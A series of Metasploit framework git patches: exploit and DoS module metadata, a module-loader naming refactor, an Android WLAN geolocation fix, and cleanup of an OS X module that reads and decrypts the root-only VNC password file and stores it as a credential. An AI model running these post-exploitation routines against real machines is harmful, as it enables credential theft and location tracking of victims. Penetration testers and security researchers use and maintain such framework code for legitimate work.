"disclosure_date": "2015-02-21", "type": "exploit", "author": [ - "Rob Carr " + "rastating" ], "description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running WordPress providing valid\n admin credentials are used.", "references": [ @@ -78300,7 +78300,7 @@ "targets": [ "WordPress" ], - "mod_time": "2018-01-15 14:48:59 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_admin_shell_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_admin_shell_upload", @@ -78561,7 +78561,7 @@ "type": "exploit", "author": [ "Kacper Szurek", - "Rob Carr " + "rastating" ], "description": "WordPress Shopping Cart (WP EasyCart) Plugin for\n WordPress contains a flaw that allows a remote\n attacker to execute arbitrary PHP code. This\n flaw exists because the\n /inc/amfphp/administration/banneruploaderscript.php\n script does not properly verify or sanitize\n user-uploaded files. By uploading a .php file,\n the remote system will place the file in a\n user-accessible path. Making a direct request to\n the uploaded file will allow the attacker to\n execute the script with the privileges of the web\n server.\n\n In versions <= 3.0.8 authentication can be done by\n using the WordPress credentials of a user with any\n role. In later versions, a valid EasyCart admin\n password will be required that is in use by any\n admin user. A default installation of EasyCart will\n setup a user called \"demouser\" with a preset password\n of \"demouser\".", "references": [ @@ -78592,7 +78592,7 @@ "targets": [ "wp-easycart" ], - "mod_time": "2018-08-20 16:05:58 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_easycart_unrestricted_file_upload", @@ -78757,7 +78757,7 @@ "type": "exploit", "author": [ "Alexander Borg", - "Rob Carr " + "rastating" ], "description": "This module exploits a file upload vulnerability in all versions of the\n Holding Pattern theme found in the upload_file.php script which contains\n no session or file validation. It allows unauthenticated users to upload\n files of any type and subsequently execute PHP scripts in the context of\n the web server.", "references": [ @@ -78788,7 +78788,7 @@ "targets": [ "holding_pattern" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_holding_pattern_file_upload", @@ -79101,7 +79101,7 @@ "type": "exploit", "author": [ "Kacper Szurek", - "Rob Carr " + "rastating" ], "description": "Photo Gallery Plugin for WordPress contains a flaw that allows a\n remote attacker to execute arbitrary PHP code. This flaw exists\n because the photo-gallery\\photo-gallery.php script allows access\n to filemanager\\UploadHandler.php. The post() method in UploadHandler.php\n does not properly verify or sanitize user-uploaded files.\n\n This module was tested on version 1.2.5.", "references": [ @@ -79133,7 +79133,7 @@ "targets": [ "photo-gallery < 1.2.6" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_photo_gallery_unrestricted_file_upload", @@ -79500,7 +79500,7 @@ "type": "exploit", "author": [ "Claudio Viviani", - "Rob Carr " + "rastating" ], "description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-symposium/server/file_upload_form.php script does not properly verify or\n sanitize user-uploaded files. By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.", "references": [ @@ -79530,7 +79530,7 @@ "targets": [ "wp-symposium < 14.12" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_symposium_shell_upload", From 46e7b8ac988ec8392af02bf6aeb9b29ff91bc583 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 1 Oct 2018 11:24:03 -0500 Subject: [PATCH 129/192] Namespace modules using full name instead of hex --- lib/msf/core/modules/loader/base.rb | 17 ++++-- spec/lib/msf/core/modules/loader/base_spec.rb | 54 ++++++++----------- 2 files changed, 34 insertions(+), 37 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index c39a4b37a4..14c69622fc 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -503,9 +503,7 @@ class Msf::Modules::Loader::Base # Returns an Array of names to make a fully qualified module name to # wrap the MetasploitModule class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are - # escaped by using 'H*' unpacking and prefixing each code with X so - # the code remains a valid module name when it starts with a digit. + # (metasploit) module's classes. # # @param [String] module_full_name The unique canonical name # for the module including type. @@ -513,7 +511,18 @@ class Msf::Modules::Loader::Base # # @see namespace_module def namespace_module_names(module_full_name) - NAMESPACE_MODULE_NAMES + [ "Mod" + module_full_name.unpack("H*").first.downcase ] + relative_name = module_full_name.split('/').map(&:capitalize).join('__') + NAMESPACE_MODULE_NAMES + [relative_name] + end + + # This reverses a namespace module's relative name to a module full name + # + # @param [String] relative_name The namespace module's relative name + # @return [String] The module full name + # + # @see namespace_module_names + def reverse_relative_name(relative_name) + relative_name.split('__').map(&:downcase).join('/') end def namespace_module_transaction(module_full_name, options={}, &block) diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index ef058b2fed..7ba6edf874 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -103,7 +103,7 @@ RSpec.describe Msf::Modules::Loader::Base do include_context 'Metasploit::Framework::Spec::Constants cleaner' let(:namespace_module_names) do - ['Msf', 'Modules', 'Mod617578696c696172792f72737065632f6d6f636b'] + ['Msf', 'Modules', 'Auxiliary__Rspec__Mock'] end let(:namespace_module) do @@ -291,7 +291,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod617578696c696172792f72737065632f6d6f636b' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -308,7 +308,7 @@ RSpec.describe Msf::Modules::Loader::Base do # create an namespace module that can be restored module Msf module Modules - module Mod617578696c696172792f72737065632f6d6f636b + module Auxiliary__Rspec__Mock class MetasploitModule < Msf::Auxiliary end @@ -316,7 +316,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @original_namespace_module = Msf::Modules::Mod617578696c696172792f72737065632f6d6f636b + @original_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock module_set = double('Module Set') allow(module_set).to receive(:delete).with(module_reference_name) @@ -549,7 +549,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -640,7 +640,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -662,12 +662,12 @@ RSpec.describe Msf::Modules::Loader::Base do it 'should return the module if it is defined' do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock end end end - expect(subject.send(:current_module, module_names)).to eq Msf::Modules::Mod0 + expect(subject.send(:current_module, module_names)).to eq Msf::Modules::Auxiliary__Rspec__Mock end end @@ -735,18 +735,12 @@ RSpec.describe Msf::Modules::Loader::Base do expect(subject.send(:namespace_module_name, module_full_name)).to start_with('Msf::Modules::') end - it 'should prefix the relative name with Mod' do - namespace_module_name = subject.send(:namespace_module_name, module_full_name) - relative_name = namespace_module_name.gsub(/^.*::/, '') - - expect(relative_name).to start_with('Mod') - end - it 'should be reversible' do namespace_module_name = subject.send(:namespace_module_name, module_full_name) - unpacked_name = namespace_module_name.gsub(/^.*::Mod/, '') + relative_name = namespace_module_name.gsub(/^.*::/, '') + reversed_name = subject.send(:reverse_relative_name, relative_name) - expect([unpacked_name].pack('H*')).to eq module_full_name + expect(reversed_name).to eq module_full_name end end @@ -755,18 +749,12 @@ RSpec.describe Msf::Modules::Loader::Base do expect(subject.send(:namespace_module_names, module_full_name)).to start_with(['Msf', 'Modules']) end - it 'should prefix the relative name with Mod' do - namespace_module_names = subject.send(:namespace_module_names, module_full_name) - - expect(namespace_module_names.last).to start_with('Mod') - end - it 'should be reversible' do namespace_module_names = subject.send(:namespace_module_names, module_full_name) relative_name = namespace_module_names.last - unpacked_name = relative_name.gsub(/^Mod/, '') + reversed_name = subject.send(:reverse_relative_name, relative_name) - expect([unpacked_name].pack('H*')).to eq module_full_name + expect(reversed_name).to eq module_full_name end end @@ -774,14 +762,14 @@ RSpec.describe Msf::Modules::Loader::Base do include_context 'Metasploit::Framework::Spec::Constants cleaner' let(:relative_name) do - 'Mod617578696c696172792f72737065632f6d6f636b' + 'Auxiliary__Rspec__Mock' end context 'with pre-existing namespace module' do before(:example) do module Msf module Modules - module Mod617578696c696172792f72737065632f6d6f636b + module Auxiliary__Rspec__Mock class Metasploit end @@ -789,7 +777,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @existent_namespace_module = Msf::Modules::Mod617578696c696172792f72737065632f6d6f636b + @existent_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock end context 'with :reload => false' do @@ -1027,7 +1015,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end it 'should do nothing if parent_module is nil' do @@ -1076,7 +1064,7 @@ RSpec.describe Msf::Modules::Loader::Base do before(:example) do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock class Metasploit end @@ -1084,7 +1072,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @original_namespace_module = Msf::Modules::Mod0 + @original_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock Msf::Modules.send(:remove_const, relative_name) end @@ -1093,7 +1081,7 @@ RSpec.describe Msf::Modules::Loader::Base do before(:example) do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock class Metasploit2 end @@ -1101,7 +1089,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @current_namespace_module = Msf::Modules::Mod0 + @current_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock end context 'with the current constant being the namespace_module' do From 4d51bace421bbb327a7470430178c2a633a24043 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 11:26:46 +0800 Subject: [PATCH 130/192] fix android wlan_geolocate --- .../ui/console/command_dispatcher/android.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index f3c8386acf..33ad4008c7 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -385,7 +385,6 @@ class Console::CommandDispatcher::Android end def cmd_geolocate(*args) - generate_map = false geolocate_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], @@ -423,10 +422,8 @@ class Console::CommandDispatcher::Android def cmd_dump_calllog(*args) path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_calllog_opts = Rex::Parser::Arguments.new( - '-h' => [ false, 'Help Banner' ], '-o' => [ true, 'Output path for call log'] - ) dump_calllog_opts.parse(args) do |opt, _idx, val| @@ -569,6 +566,7 @@ class Console::CommandDispatcher::Android '-a' => [ true, 'API key' ], ) + api_key = '' wlan_geolocate_opts.parse(args) do |opt, _idx, val| case opt when '-h' @@ -581,13 +579,19 @@ class Console::CommandDispatcher::Android end end + if api_key.blank? + print_error("You must enter an api_key") + print_error("e.g. wlan_geolocate -a YOUR_API_KEY") + print_line(wlan_geolocate_opts.usage) + return + end + log = client.android.wlan_geolocate wlan_list = [] log.each do |x| mac = x['bssid'] - ssid = x['ssid'] ss = x['level'] - wlan_list << [mac, ssid, ss.to_s] + wlan_list << [mac, ss.to_s] end if wlan_list.to_s.empty? @@ -606,7 +610,7 @@ class Console::CommandDispatcher::Android print_error("Error: #{e}") else print_status(g.to_s) - print_status("Google Maps URL: #{g.google_maps_url}") + print_status("Google Maps URL: #{g.google_maps_url}") end end From 5cfc19b804be37d0fe9424de5949704c9dff6297 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 11:35:47 +0800 Subject: [PATCH 131/192] fix post/multi/gather/wlan_geolocate on Android --- modules/post/multi/gather/wlan_geolocate.rb | 28 ++++++++++++++++++--- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index 4bd5862ece..c8fbc4a089 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, 'Author' => [ 'Tom Sellers '], - 'Platform' => %w{ osx win linux bsd solaris }, + 'Platform' => %w{ android osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) @@ -185,9 +185,31 @@ class MetasploitModule < Msf::Post print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] return end - + when 'android' + log = client.android.wlan_geolocate + listing = '' + wlan_list = [] + log.each do |x| + mac = x['bssid'] + ssid = x['ssid'] + ss = x['level'].to_s + listing += "BSSID: #{mac}\n" + listing += "SSID: #{ssid}\n" + listing += "Strength: #{ss}\n\n" + wlan_list << [mac, ssid, ss] + end + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + end + store_loot("host.android.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_good("Target's wireless networks:\n\n#{listing}\n") + if datastore['GEOLOCATE'] + perform_geolocation(wlan_list) + return + end else - print_error("The target's platform, #{platform}, is not supported at this time.") + print_error("The target's platform, #{session.platform}, is not supported at this time.") return nil end From b993d74f6cdb13aa016d87631b1861999112fbbe Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 11:38:20 +0800 Subject: [PATCH 132/192] minor tweak --- .../meterpreter/ui/console/command_dispatcher/android.rb | 5 +++-- modules/post/multi/gather/wlan_geolocate.rb | 4 +--- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 33ad4008c7..9abdbda6c1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -590,8 +590,9 @@ class Console::CommandDispatcher::Android wlan_list = [] log.each do |x| mac = x['bssid'] + ssid = x['ssid'] ss = x['level'] - wlan_list << [mac, ss.to_s] + wlan_list << [mac, ssid, ss.to_s] end if wlan_list.to_s.empty? @@ -602,7 +603,7 @@ class Console::CommandDispatcher::Android g.set_api_key(api_key) wlan_list.each do |wlan| - g.add_wlan(*wlan) + g.add_wlan(wlan[0], wlan[2]) # bssid, signalstrength end begin g.fetch! diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index c8fbc4a089..2a7e8474ba 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -102,12 +102,10 @@ class MetasploitModule < Msf::Post print_error("Error: #{e}") else print_status(g.to_s) - print_status("Google Maps URL: #{g.google_maps_url}") + print_status("Google Maps URL: #{g.google_maps_url}") end - end - # Run Method for when run command is issued def run case session.platform From e6c041003e9013971d21236233560935945911c2 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 11:51:29 +0800 Subject: [PATCH 133/192] fix documentation --- documentation/modules/post/multi/gather/wlan_geolocate.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/post/multi/gather/wlan_geolocate.md b/documentation/modules/post/multi/gather/wlan_geolocate.md index e8a9d33f26..6c4edae1c0 100644 --- a/documentation/modules/post/multi/gather/wlan_geolocate.md +++ b/documentation/modules/post/multi/gather/wlan_geolocate.md @@ -8,6 +8,7 @@ - Linux: `iwlist scanning` - Solaris: `dladm scan-wifi` - BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"` + - Android: [WifiManager](https://developer.android.com/reference/android/net/wifi/WifiManager) If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized. These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original From b5cf6821693abc53b51a69b6c9c48f63fa7244d0 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 14:22:09 +0800 Subject: [PATCH 134/192] cleanup post/osx/gather/vnc_password_osx and add loot/credentials --- .../post/osx/gather/vnc_password_osx.md | 5 ++- modules/post/osx/gather/vnc_password_osx.rb | 39 +++++++------------ 2 files changed, 19 insertions(+), 25 deletions(-) diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md index 7fe75adf0f..7e3ff7d6ac 100644 --- a/documentation/modules/post/osx/gather/vnc_password_osx.md +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -1,4 +1,7 @@ -This module show Apple VNC Password from Mac OS X High Sierra. +This module shows Apple VNC Password from Mac OS X High Sierra. + +The password can be set by visiting: +System Preferences > Sharing > Screen Sharing > Computer Settings ## Vulnerable Application diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index 4d6053cd37..cb4642dcb6 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'OS X Display Apple VNC Password', 'Description' => %q{ - This module show Apple VNC Password from Mac OS X High Sierra. + This module shows Apple VNC Password from Mac OS X High Sierra. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kevin Gonzalvo '], @@ -38,39 +38,30 @@ class MetasploitModule < Msf::Post for data in fixedkey; str += (data ^ array_pwd.shift).chr end - return str - end - - def get_file(filename) - begin - client.fs.file.stat(filename) - config = client.fs.file.new(filename,'r') - value = config.read - return value - rescue - return nil - end + return str.delete("\0") end def run - case session.type - when /meterpreter/ - host = sysinfo["Computer"] - when /shell/ - host = cmd_exec("hostname") - end - - print_status("Running module against #{host}") unless is_root? - fail_with(Failure::NoAccess, 'It is necessary to be root!') + fail_with(Failure::NoAccess, "Root privileges are required to read VNC password file") end - print_status("This session is running as root!") print_status("Checking VNC Password...") vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt' - passwd_encrypt = get_file("#{vncsettings_path}") + passwd_encrypt = read_file("#{vncsettings_path}") final_passwd = decrypt_hash("#{passwd_encrypt}") if !final_passwd.nil? print_good("Password Found: #{final_passwd}") + pass_file = store_loot("osx.vnc.password", "text/plain", session, final_passwd, "passwd.pwd", "OSX VNC Password") + print_good("Password data stored as loot in: #{pass_file}") + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.fullname, + private_type: :password, + private_data: final_passwd.to_s, + workspace_id: myworkspace_id + } + create_credential(credential_data) else print_error("Password not found") end From 488b88fe0436c7f29d04fe8e708a9f2496cc0b7d Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 2 Oct 2018 14:30:56 +0800 Subject: [PATCH 135/192] fix documentation --- .../modules/post/osx/gather/vnc_password_osx.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md index 7e3ff7d6ac..a63a18e679 100644 --- a/documentation/modules/post/osx/gather/vnc_password_osx.md +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -5,7 +5,7 @@ System Preferences > Sharing > Screen Sharing > Computer Settings ## Vulnerable Application - * macOS 10.13.6* + * macOS 10.13.6 ## Verification Steps @@ -13,10 +13,11 @@ System Preferences > Sharing > Screen Sharing > Computer Settings Example steps in this format (is also in the PR): 1. Start `msfconsole` - 2. Do: `post/osx/gather/vnc_password_osx` - 3. Do: set the `SESSION [ID]` - 4. Do: ```run``` - 5. You should get the password + 2. Get an OSX meterpreter session running as root + 3. Do: `use post/osx/gather/vnc_password_osx` + 4. Do: `set SESSION [ID]` + 5. Do: `run` + 6. You should see the password ## Scenarios @@ -29,10 +30,9 @@ msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 SESSION => 1 msf5 post(osx/gather/vnc_password_osx) > exploit -[*] Running module against MacBook-Pro.local -[*] This session is running as root! [*] Checking VNC Password... [+] Password Found: PoCpassw +[+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt [*] Post module execution completed msf5 post(osx/gather/vnc_password_osx) > ``` From 95d4856b3a6838648e8add4070b1023a09d6fda3 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 1 Oct 2018 23:56:24 -0700 Subject: [PATCH 136/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 146 ++++++++++++++++++++++++++++++++++ 1 file changed, 146 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index d0bcfaf645..92a5720ba2 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -9013,6 +9013,47 @@ "notes": { } }, + "auxiliary_dos/http/slowloris": { + "name": "Slowloris Denial of Service Attack", + "full_name": "auxiliary/dos/http/slowloris", + "rank": 300, + "disclosure_date": "2009-06-17", + "type": "auxiliary", + "author": [ + "RSnake", + "Gokberk Yaltirakli", + "Daniel Teixeira", + "Matthew Kienow " + ], + "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", + "references": [ + "CVE-2007-6750", + "CVE-2010-2227", + "EDB-8976", + "URL-https://github.com/gkbrk/slowloris" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-08-28 13:49:31 +0000", + "path": "/modules/auxiliary/dos/http/slowloris.py", + "is_install_path": true, + "ref_name": "dos/http/slowloris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/http/sonicwall_ssl_format": { "name": "SonicWALL SSL-VPN Format String Vulnerability", "full_name": "auxiliary/dos/http/sonicwall_ssl_format", @@ -10027,6 +10068,42 @@ "notes": { } }, + "auxiliary_dos/smb/smb_loris": { + "name": "SMBLoris NBSS Denial of Service", + "full_name": "auxiliary/dos/smb/smb_loris", + "rank": 300, + "disclosure_date": "2017-06-29", + "type": "auxiliary", + "author": [ + "thelightcosine", + "Adam Cammack " + ], + "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", + "references": [ + "URL-http://smbloris.com/" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-03-23 14:55:18 +0000", + "path": "/modules/auxiliary/dos/smb/smb_loris.rb", + "is_install_path": true, + "ref_name": "dos/smb/smb_loris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/smtp/sendmail_prescan": { "name": "Sendmail SMTP Address prescan Memory Corruption", "full_name": "auxiliary/dos/smtp/sendmail_prescan", @@ -10259,6 +10336,44 @@ "notes": { } }, + "auxiliary_dos/tcp/claymore_dos": { + "name": "Claymore Dual GPU Miner Format String dos attack", + "full_name": "auxiliary/dos/tcp/claymore_dos", + "rank": 300, + "disclosure_date": "2018-02-06", + "type": "auxiliary", + "author": [ + "res1n", + "bluebird" + ], + "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", + "references": [ + "CVE-2018-6317", + "EDB-43972", + "URL-https://github.com/nanopool/Claymore-Dual-Miner" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 3333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-08-29 06:09:40 +0000", + "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", + "is_install_path": true, + "ref_name": "dos/tcp/claymore_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/tcp/junos_tcp_opt": { "name": "Juniper JunOS Malformed TCP Option", "full_name": "auxiliary/dos/tcp/junos_tcp_opt", @@ -146941,6 +147056,37 @@ "notes": { } }, + "post_osx/gather/vnc_password_osx": { + "name": "OS X Display Apple VNC Password", + "full_name": "post/osx/gather/vnc_password_osx", + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kevin Gonzalvo " + ], + "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", + "references": [ + + ], + "is_server": false, + "is_client": false, + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2018-10-02 14:22:09 +0000", + "path": "/modules/post/osx/gather/vnc_password_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/vnc_password_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "post_osx/manage/mount_share": { "name": "OSX Network Share Mounter", "full_name": "post/osx/manage/mount_share", From 304acd42f0b94fa2627e70aa40204b38e36e9db8 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 2 Oct 2018 05:23:13 -0500 Subject: [PATCH 137/192] minor comment tweaks --- lib/msf/ui/console/command_dispatcher/exploit.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index 6d03198802..83dfe871ad 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -165,7 +165,7 @@ class Exploit end rhosts = mod.datastore['RHOSTS'] - # For mutilple targets exploit attempts. + # For multiple targets exploit attempts. if rhosts opts[:multi] = true rhosts_range = Rex::Socket::RangeWalker.new(rhosts) @@ -196,7 +196,7 @@ class Exploit # For single target. else session = exploit_single(mod, opts) - # If we were given a session, let's see what we can do with it + # If we were given a session, let's see what we can do with it if session any_session = true if !opts['Background'] && session.interactive? From 4b1363aa68b81266c7099aec932db25a002b05d0 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Tue, 2 Oct 2018 03:23:56 -0700 Subject: [PATCH 138/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 66 +++++++++++++++++------------------ 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 92a5720ba2..818fc5047e 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -143201,6 +143201,37 @@ "notes": { } }, + "post_android/gather/sub_info": { + "name": "extracts subscriber info from target device", + "full_name": "post/android/gather/sub_info", + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus" + ], + "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.", + "references": [ + + ], + "is_server": false, + "is_client": false, + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2018-10-01 16:54:46 +0000", + "path": "/modules/post/android/gather/sub_info.rb", + "is_install_path": true, + "ref_name": "android/gather/sub_info", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "post_android/gather/wireless_ap": { "name": "Displays wireless SSIDs and PSKs", "full_name": "post/android/gather/wireless_ap", @@ -143298,37 +143329,6 @@ "notes": { } }, - "post_android/sub_info": { - "name": "extracts subscriber info from target device", - "full_name": "post/android/sub_info", - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus" - ], - "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.", - "references": [ - - ], - "is_server": false, - "is_client": false, - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2018-07-26 16:48:34 +0000", - "path": "/modules/post/android/sub_info.rb", - "is_install_path": true, - "ref_name": "android/sub_info", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - } - }, "post_cisco/gather/enum_cisco": { "name": "Cisco Gather Device General Information", "full_name": "post/cisco/gather/enum_cisco", @@ -145913,13 +145913,13 @@ ], "is_server": false, "is_client": false, - "platform": "BSD,Linux,OSX,Solaris,Windows", + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2017-10-01 19:49:32 +0000", + "mod_time": "2018-10-02 11:38:20 +0000", "path": "/modules/post/multi/gather/wlan_geolocate.rb", "is_install_path": true, "ref_name": 